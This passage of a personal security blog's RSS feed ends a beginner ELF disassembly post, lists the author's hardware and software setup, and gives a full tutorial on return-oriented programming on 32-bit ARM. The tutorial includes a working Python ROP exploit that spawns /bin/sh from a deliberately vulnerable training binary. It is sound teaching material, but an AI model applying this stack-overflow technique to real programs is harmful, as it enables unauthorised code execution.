0x7ff:  jle     0x7d0
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;And this looks like our &lt;code&gt;strcmp()&lt;/code&gt;&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;0x843:  mov     rdx, qword ptr [rbp - 0x10] ; *in
0x847:  mov     rax, qword ptr [rbp - 8]    ; *pw
0x84b:  mov     rsi, rdx             
0x84e:  mov     rdi, rax
0x851:  call    0x670                       ; strcmp  
0x856:  test    eax, eax                    ; is = 0? 
0x858:  jne     0x868                       ; no? jump to 0x868
0x85a:  lea     rdi, [rip + 0xae]           ; &quot;haha yes!&quot; 
0x861:  call    0x640                       ; puts
0x866:  jmp     0x874
0x868:  lea     rdi, [rip + 0xaa]           ; &quot;nah dude&quot;
0x86f:  call    0x640                       ; puts  
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;I’m not sure why it uses &lt;code&gt;puts&lt;/code&gt; here? I might be missing something; perhaps &lt;code&gt;printf&lt;/code&gt; calls &lt;code&gt;puts&lt;/code&gt;. I could be wrong. I also confirmed with radare2 that those locations are actually the strings “haha yes!” and “nah dude”.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: It&amp;#8217;s because of compiler optimization. A &lt;code&gt;printf()&lt;/code&gt; (in this case) is seen as a bit overkill, and hence gets simplified to a &lt;code&gt;puts()&lt;/code&gt;.&lt;/p&gt;

&lt;h3 id=&quot;conclusion&quot;&gt;Conclusion&lt;/h3&gt;

&lt;p&gt;Wew, that took quite some time. But we’re done. If you’re a beginner, you might find this extremely confusing, or probably didn’t even understand what was going on. And that’s okay. Building an intuition for reading and grokking disassembly comes with practice. I’m no good at it either.&lt;/p&gt;

&lt;p&gt;All the code used in this post is here: &lt;a href=&quot;https://github.com/icyphox/asdf/tree/master/reversing-elf&quot;&gt;https://github.com/icyphox/asdf/tree/master/reversing-elf&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Ciao for now, and I’ll see ya in #2 of this series — PE binaries. Whenever that is.&lt;/p&gt;
</description>
      <pubDate>Fri, 08 Feb 2019 00:00:00 +0000</pubDate>
      <guid>https://icyphox.sh/blog/python-for-re-1/</guid>
</item>
<item>
      <title>My Setup</title>
	  <link>https://icyphox.sh/blog/my-setup</link>
      <description>&lt;h1 id=&quot;my-setup&quot;&gt;My Setup&lt;/h1&gt;

&lt;h2 id=&quot;my-daily-drivers-hardware-and-software&quot;&gt;My daily drivers — hardware and software&lt;/h2&gt;

&lt;h3 id=&quot;hardware&quot;&gt;Hardware&lt;/h3&gt;

&lt;p&gt;The only computer I have with me is my &lt;a href=&quot;https://store.hp.com/us/en/mdp/laptops/envy-13&quot;&gt;HP Envy 13 (2018)&lt;/a&gt; (my model looks a little different). It’s a 13” ultrabook, with an i5 8250u,
8 gigs of RAM and a 256 GB NVMe SSD. It’s a very comfy machine that does everything I need it to.&lt;/p&gt;

&lt;p&gt;For my phone, I use a &lt;a href=&quot;https://www.oneplus.in/6t&quot;&gt;OnePlus 6T&lt;/a&gt;, running stock &lt;a href=&quot;https://www.oneplus.in/oxygenos&quot;&gt;OxygenOS&lt;/a&gt;. As of this writing, its bootloader hasn’t been unlocked and nor has the device been rooted.
I’m also a proud owner of a &lt;a href=&quot;https://en.wikipedia.org/wiki/Nexus_5&quot;&gt;Nexus 5&lt;/a&gt;, which I really wish Google rebooted. It’s surprisingly still usable and runs Android Pie, although the SIM slot is ruined and the battery backup is abysmal.&lt;/p&gt;

&lt;p&gt;My watch is a &lt;a href=&quot;https://www.samsung.com/in/wearables/gear-s3-frontier-r760/&quot;&gt;Samsung Gear S3 Frontier&lt;/a&gt;. Tizen is definitely better than Android Wear.&lt;/p&gt;

&lt;p&gt;My keyboard, although not with me in college, is a very old &lt;a href=&quot;https://www.amazon.com/Dell-Keyboard-Model-SK-8110-Interface/dp/B00366HMMO&quot;&gt;Dell SK-8110&lt;/a&gt;. 
For the little bit of gaming that I do, I use a &lt;a href=&quot;https://www.hpshopping.in/hp-m150-gaming-mouse-3dr63pa.html&quot;&gt;HP m150&lt;/a&gt; gaming mouse. It’s the perfect size (and color).&lt;/p&gt;

&lt;p&gt;For my music, I use the &lt;a href=&quot;https://www.boseindia.com/en_in/products/headphones/over_ear_headphones/soundlink-around-ear-wireless-headphones-ii.html&quot;&gt;Bose SoundLink II&lt;/a&gt;. 
Great pair of headphones, although the ear cups need replacing.&lt;/p&gt;

&lt;h3 id=&quot;and-the-software&quot;&gt;And the software&lt;/h3&gt;

&lt;p&gt;&lt;del&gt;My distro of choice for the past ~1 year has been &lt;a href=&quot;https://elementary.io&quot;&gt;elementary OS&lt;/a&gt;. I used to be an Arch Linux elitist, complete with an esoteric
window manager, all riced. I now use whatever JustWorks™.&lt;/del&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: As of June 2019, I&amp;#8217;ve switched over to a vanilla Debian 9 Stretch install,
running &lt;a href=&quot;https://i3wm.org&quot;&gt;i3&lt;/a&gt; as my window manager. If you want, you can dig through my configs at my &lt;a href=&quot;https://github.com/icyphox/dotfiles&quot;&gt;dotfiles&lt;/a&gt; repo. &lt;/p&gt;

&lt;p&gt;Here’s a (riced) screenshot of my desktop. &lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://i.redd.it/jk574gworp331.png&quot; alt=&quot;scrot&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Most of my work is done in either the browser, or the terminal.
My shell is pure &lt;a href=&quot;http://www.zsh.org&quot;&gt;zsh&lt;/a&gt;, as in no plugin frameworks. It’s customized using built-in zsh functions. Yes, you don’t actually need
a framework. It’s useless bloat. The prompt itself is generated using a framework I built in &lt;a href=&quot;https://nim-lang.org&quot;&gt;Nim&lt;/a&gt; — &lt;a href=&quot;https://github.com/icyphox/nicy&quot;&gt;nicy&lt;/a&gt;.
My primary text editor is &lt;a href=&quot;https://neovim.org&quot;&gt;nvim&lt;/a&gt;. Again, all configs in my dotfiles repo linked above.
I manage all my passwords using &lt;a href=&quot;https://passwordstore.org&quot;&gt;pass(1)&lt;/a&gt;, and I use &lt;a href=&quot;https://github.com/carnager/rofi-pass&quot;&gt;rofi-pass&lt;/a&gt; to access them via &lt;code&gt;rofi&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Most of my security tooling is typically run via a Kali Linux docker container. This is convenient for many reasons, keeps your global namespace
clean and a single command to drop into a Kali shell.&lt;/p&gt;

&lt;p&gt;I use a DigitalOcean droplet (BLR1) as a public filehost, found at &lt;a href=&quot;https://x.icyphox.sh&quot;&gt;x.icyphox.sh&lt;/a&gt;. The UI is the wonderful &lt;a href=&quot;https://github.com/zeit/serve&quot;&gt;serve&lt;/a&gt;, by &lt;a href=&quot;https://zeit.co&quot;&gt;ZEIT&lt;/a&gt;.
The same box also serves as my IRC bouncer and OpenVPN (TCP), which I tunnel via SSH running on 443. Campus firewall woes. &lt;/p&gt;

&lt;p&gt;I plan on converting my desktop back at home into a homeserver setup. Soon™.&lt;/p&gt;
</description>
      <pubDate>Mon, 13 May 2019 00:00:00 +0000</pubDate>
      <guid>https://icyphox.sh/blog/my-setup/</guid>
</item>
<item>
      <title>Return Oriented Programming on ARM (32-bit)</title>
	  <link>https://icyphox.sh/blog/rop-on-arm/</link>
      <description>&lt;h1 id=&quot;return-oriented-programming-on-arm-32-bit&quot;&gt;Return Oriented Programming on ARM (32-bit)&lt;/h1&gt;


&lt;h2 id=&quot;making-stack-based-exploitation-great-again&quot;&gt;Making stack-based exploitation great again!&lt;/h2&gt;

&lt;p&gt;Before we start &lt;em&gt;anything&lt;/em&gt;, you’re expected to know the basics of ARM
assembly to follow along. I highly recommend
&lt;a href=&quot;https://twitter.com/fox0x01&quot;&gt;Azeria’s&lt;/a&gt; series on &lt;a href=&quot;https://azeria-labs.com/writing-arm-assembly-part-1/&quot;&gt;ARM Assembly
Basics&lt;/a&gt;. Once you’re
comfortable with it, proceed with the next bit — environment setup.&lt;/p&gt;

&lt;h3 id=&quot;setup&quot;&gt;Setup&lt;/h3&gt;

&lt;p&gt;Since we’re working with the ARM architecture, there are two options to go
forth with: &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Emulate — head over to &lt;a href=&quot;https://www.qemu.org/download/&quot;&gt;qemu.org/download&lt;/a&gt; and install QEMU. 
And then download and extract the ARMv6 Debian Stretch image from one of the links &lt;a href=&quot;https://blahcat.github.io/qemu/&quot;&gt;here&lt;/a&gt;.
The scripts found inside should be self-explanatory.&lt;/li&gt;
&lt;li&gt;Use actual ARM hardware, like an RPi.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;For debugging and disassembling, we’ll be using plain old &lt;code&gt;gdb&lt;/code&gt;, but you
may use &lt;code&gt;radare2&lt;/code&gt;, IDA or anything else, really. All of which can be
trivially installed.&lt;/p&gt;

&lt;p&gt;And for the sake of simplicity, disable ASLR:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ echo 0 &amp;gt; /proc/sys/kernel/randomize_va_space
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Finally, the binary we’ll be using in this exercise is &lt;a href=&quot;https://twitter.com/bellis1000&quot;&gt;Billy Ellis’&lt;/a&gt;
&lt;a href=&quot;/static/files/roplevel2.c&quot;&gt;roplevel2&lt;/a&gt;. &lt;/p&gt;

&lt;p&gt;Compile it:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ gcc roplevel2.c -o rop2
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;With that out of the way, here’s a quick run down of what ROP actually is.&lt;/p&gt;

&lt;h3 id=&quot;a-primer-on-rop&quot;&gt;A primer on ROP&lt;/h3&gt;

&lt;p&gt;ROP or Return Oriented Programming is a modern exploitation technique that’s
used to bypass protections like the &lt;strong&gt;NX bit&lt;/strong&gt; (no-execute bit) and &lt;strong&gt;code sigining&lt;/strong&gt;.
In essence, no code in the binary is actually modified and the entire exploit
is crafted out of pre-existing artifacts within the binary, known as &lt;strong&gt;gadgets&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;A gadget is essentially a small sequence of code (instructions), ending with
a &lt;code&gt;ret&lt;/code&gt;, or a return instruction. In our case, since we’re dealing with ARM
code, there is no &lt;code&gt;ret&lt;/code&gt; instruction but rather a &lt;code&gt;pop {pc}&lt;/code&gt; or a &lt;code&gt;bx lr&lt;/code&gt;.
These gadgets are &lt;em&gt;chained&lt;/em&gt; together by jumping (returning) from one onto the other
to form what’s called as a &lt;strong&gt;ropchain&lt;/strong&gt;. At the end of a ropchain,
there’s generally a call to &lt;code&gt;system()&lt;/code&gt;, to acheive code execution.&lt;/p&gt;

&lt;p&gt;In practice, the process of executing a ropchain is something like this:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;confirm the existence of a stack-based buffer overflow&lt;/li&gt;
&lt;li&gt;identify the offset at which the instruction pointer gets overwritten&lt;/li&gt;
&lt;li&gt;locate the addresses of the gadgets you wish to use&lt;/li&gt;
&lt;li&gt;craft your input keeping in mind the stack’s layout, and chain the addresses
of your gadgets&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href=&quot;https://twitter.com/LiveOverflow&quot;&gt;LiveOverflow&lt;/a&gt; has a &lt;a href=&quot;https://www.youtube.com/watch?v=zaQVNM3or7k&amp;amp;list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&amp;amp;index=46&amp;amp;t=0s&quot;&gt;beautiful video&lt;/a&gt; where he explains ROP using “weird machines”. 
Check it out, it might be just what you needed for that “aha!” moment :)&lt;/p&gt;

&lt;p&gt;Still don’t get it? Don’t fret, we’ll look at &lt;em&gt;actual&lt;/em&gt; exploit code in a bit and hopefully
that should put things into perspective.&lt;/p&gt;

&lt;h3 id=&quot;exploring-our-binary&quot;&gt;Exploring our binary&lt;/h3&gt;

&lt;p&gt;Start by running it, and entering any arbitrary string. On entering a fairly
large string, say, “A” × 20, we
see a segmentation fault occur.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/string_segfault.png&quot; alt=&quot;string and segfault&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Now, open it up in &lt;code&gt;gdb&lt;/code&gt; and look at the functions inside it.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/gdb_functions.png&quot; alt=&quot;gdb functions&quot; /&gt;&lt;/p&gt;

&lt;p&gt;There are three functions that are of importance here, &lt;code&gt;main&lt;/code&gt;, &lt;code&gt;winner&lt;/code&gt; and 
&lt;code&gt;gadget&lt;/code&gt;. Disassembling the &lt;code&gt;main&lt;/code&gt; function:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/gdb_main_disas.png&quot; alt=&quot;gdb main disassembly&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We see a buffer of 16 bytes being created (&lt;code&gt;sub sp, sp, #16&lt;/code&gt;), and some calls
to &lt;code&gt;puts()&lt;/code&gt;/&lt;code&gt;printf()&lt;/code&gt; and &lt;code&gt;scanf()&lt;/code&gt;. Looks like &lt;code&gt;winner&lt;/code&gt; and &lt;code&gt;gadget&lt;/code&gt; are 
never actually called.&lt;/p&gt;

&lt;p&gt;Disassembling the &lt;code&gt;gadget&lt;/code&gt; function:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/gdb_gadget_disas.png&quot; alt=&quot;gdb gadget disassembly&quot; /&gt;&lt;/p&gt;

&lt;p&gt;This is fairly simple, the stack is being initialized by &lt;code&gt;push&lt;/code&gt;ing &lt;code&gt;{r11}&lt;/code&gt;,
which is also the frame pointer (&lt;code&gt;fp&lt;/code&gt;). What’s interesting is the &lt;code&gt;pop {r0, pc}&lt;/code&gt;
instruction in the middle. This is a &lt;strong&gt;gadget&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;We can use this to control what goes into &lt;code&gt;r0&lt;/code&gt; and &lt;code&gt;pc&lt;/code&gt;. Unlike in x86 where
arguments to functions are passed on the stack, in ARM the registers &lt;code&gt;r0&lt;/code&gt; to &lt;code&gt;r3&lt;/code&gt;
are used for this. So this gadget effectively allows us to pass arguments to
functions using &lt;code&gt;r0&lt;/code&gt;, and subsequently jumping to them by passing its address
in &lt;code&gt;pc&lt;/code&gt;. Neat.&lt;/p&gt;

&lt;p&gt;Moving on to the disassembly of the &lt;code&gt;winner&lt;/code&gt; function:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/gdb_disas_winner.png&quot; alt=&quot;gdb winner disassembly&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Here, we see a calls to &lt;code&gt;puts()&lt;/code&gt;, &lt;code&gt;system()&lt;/code&gt; and finally, &lt;code&gt;exit()&lt;/code&gt;.
So our end goal here is to, quite obviously, execute code via the &lt;code&gt;system()&lt;/code&gt;
function.&lt;/p&gt;

&lt;p&gt;Now that we have an overview of what’s in the binary, let’s formulate a method
of exploitation by messing around with inputs.&lt;/p&gt;

&lt;h3 id=&quot;messing-around-with-inputs&quot;&gt;Messing around with inputs :^)&lt;/h3&gt;

&lt;p&gt;Back to &lt;code&gt;gdb&lt;/code&gt;, hit &lt;code&gt;r&lt;/code&gt; to run and pass in a patterned input, like in the
screenshot.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/gdb_info_reg_segfault.png&quot; alt=&quot;gdb info reg post segfault&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We hit a segfault because of invalid memory at address &lt;code&gt;0x46464646&lt;/code&gt;. Notice
the &lt;code&gt;pc&lt;/code&gt; has been overwritten with our input.
So we smashed the stack alright, but more importantly, it’s at the letter ‘F’.&lt;/p&gt;

&lt;p&gt;Since we know the offset at which the &lt;code&gt;pc&lt;/code&gt; gets overwritten, we can now
control program execution flow. Let’s try jumping to the &lt;code&gt;winner&lt;/code&gt; function.&lt;/p&gt;

&lt;p&gt;Disassemble &lt;code&gt;winner&lt;/code&gt; again using &lt;code&gt;disas winner&lt;/code&gt; and note down the offset
of the second instruction — &lt;code&gt;add r11, sp, #4&lt;/code&gt;. 
For this, we’ll use Python to print our input string replacing &lt;code&gt;FFFF&lt;/code&gt; with
the address of &lt;code&gt;winner&lt;/code&gt;. Note the endianness.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ python -c &#x27;print(&quot;AAAABBBBCCCCDDDDEEEE\x28\x05\x01\x00&quot;)&#x27; | ./rop2
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/python_winner_jump.png&quot; alt=&quot;jump to winner&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The reason we don’t jump to the first instruction is because we want to control the stack
ourselves. If we allow &lt;code&gt;push {rll, lr}&lt;/code&gt; (first instruction) to occur, the program will &lt;code&gt;pop&lt;/code&gt;
those out after &lt;code&gt;winner&lt;/code&gt; is done executing and we will no longer control 
where it jumps to.&lt;/p&gt;

&lt;p&gt;So that didn’t do much, just prints out a string “Nothing much here&amp;#8230;”. 
But it &lt;em&gt;does&lt;/em&gt; however, contain &lt;code&gt;system()&lt;/code&gt;. Which somehow needs to be populated with an argument
to do what we want (run a command, execute a shell, etc.).&lt;/p&gt;

&lt;p&gt;To do that, we’ll follow a multi-step process: &lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Jump to the address of &lt;code&gt;gadget&lt;/code&gt;, again the 2nd instruction. This will &lt;code&gt;pop&lt;/code&gt; &lt;code&gt;r0&lt;/code&gt; and &lt;code&gt;pc&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Push our command to be executed, say “&lt;code&gt;/bin/sh&lt;/code&gt;” onto the stack. This will go into
&lt;code&gt;r0&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Then, push the address of &lt;code&gt;system()&lt;/code&gt;. And this will go into &lt;code&gt;pc&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The pseudo-code is something like this:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;string = AAAABBBBCCCCDDDDEEEE
gadget = # addr of gadget
binsh  = # addr of /bin/sh
system = # addr of system()

print(string + gadget + binsh + system)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Clean and mean.&lt;/p&gt;

&lt;h3 id=&quot;the-exploit&quot;&gt;The exploit&lt;/h3&gt;

&lt;p&gt;To write the exploit, we’ll use Python and the absolute godsend of a library — &lt;code&gt;struct&lt;/code&gt;.
It allows us to pack the bytes of addresses to the endianness of our choice.
It probably does a lot more, but who cares.&lt;/p&gt;

&lt;p&gt;Let’s start by fetching the address of &lt;code&gt;/bin/sh&lt;/code&gt;. In &lt;code&gt;gdb&lt;/code&gt;, set a breakpoint
at &lt;code&gt;main&lt;/code&gt;, hit &lt;code&gt;r&lt;/code&gt; to run, and search the entire address space for the string “&lt;code&gt;/bin/sh&lt;/code&gt;”:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;(gdb) find &amp;amp;system, +9999999, &quot;/bin/sh&quot;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/gdb_find_binsh.png&quot; alt=&quot;gdb finding /bin/sh&quot; /&gt;&lt;/p&gt;

&lt;p&gt;One hit at &lt;code&gt;0xb6f85588&lt;/code&gt;. The addresses of &lt;code&gt;gadget&lt;/code&gt; and &lt;code&gt;system()&lt;/code&gt; can be
found from the disassmblies from earlier. Here’s the final exploit code:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;import struct

binsh = struct.pack(&quot;I&quot;, 0xb6f85588)
string = &quot;AAAABBBBCCCCDDDDEEEE&quot;
gadget = struct.pack(&quot;I&quot;, 0x00010550)
system = struct.pack(&quot;I&quot;, 0x00010538)

print(string + gadget + binsh + system)

&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Honestly, not too far off from our pseudo-code :)&lt;/p&gt;

&lt;p&gt;Let’s see it in action:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/the_shell.png&quot; alt=&quot;the shell!&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Notice that it doesn’t work the first time, and this is because &lt;code&gt;/bin/sh&lt;/code&gt; terminates
when the pipe closes, since there’s no input coming in from STDIN.
To get around this, we use &lt;code&gt;cat(1)&lt;/code&gt; which allows us to relay input through it
to the shell. Nifty trick.&lt;/p&gt;

&lt;h3 id=&quot;conclusion&quot;&gt;Conclusion&lt;/h3&gt;

&lt;p&gt;This was a fairly basic challenge, with everything laid out conveniently. 
Actual ropchaining is a little more involved, with a lot more gadgets to be chained
to acheive code execution.&lt;/p&gt;

&lt;p&gt;Hopefully, I’ll get around to writing about heap exploitation on ARM too. That’s all for now.&lt;/p&gt;
</description>
      <pubDate>Thu, 06 Jun 2019 00:00:00 +0000</pubDate>
      <guid>https://icyphox.sh/blog/rop-on-arm/</guid>
</item>

    </channel>
</rss>